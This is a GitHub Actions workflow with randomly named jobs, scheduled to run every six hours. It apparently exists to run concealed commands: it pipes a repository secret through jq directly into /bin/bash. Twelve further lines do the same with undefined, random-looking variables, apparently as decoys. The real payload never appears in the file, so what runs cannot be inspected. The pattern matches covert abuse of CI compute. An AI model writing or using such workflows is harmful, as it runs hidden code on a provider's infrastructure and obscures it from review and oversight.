name: wanghuangzi4536
on:
  workflow_dispatch:
  schedule:
    - cron: '15 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wanghuangzi4536
        env:
          xx2: ${{ secrets.xx2 }}
        run: |
          echo $xx2 | jq -r .pty1 | /bin/bash
          echo $pspk140 | jq -r .ooh089 | /bin/bash
          echo $dp8 | jq -r .l5 | /bin/bash
          echo $kwe85001 | jq -r .yka4 | /bin/bash
          echo $jufvb56 | jq -r .r5 | /bin/bash
          echo $xl222 | jq -r .alcm6373 | /bin/bash
          echo $jcvn59738 | jq -r .ez0 | /bin/bash
          echo $cu55876 | jq -r .q362 | /bin/bash
          echo $ipz80946 | jq -r .mrvog67 | /bin/bash
          echo $nwld923 | jq -r .ywi5292 | /bin/bash
          echo $lv5478 | jq -r .xkwr26359 | /bin/bash
          echo $refm03479 | jq -r .vnnf67786 | /bin/bash
          echo $l11 | jq -r .t27 | /bin/bash

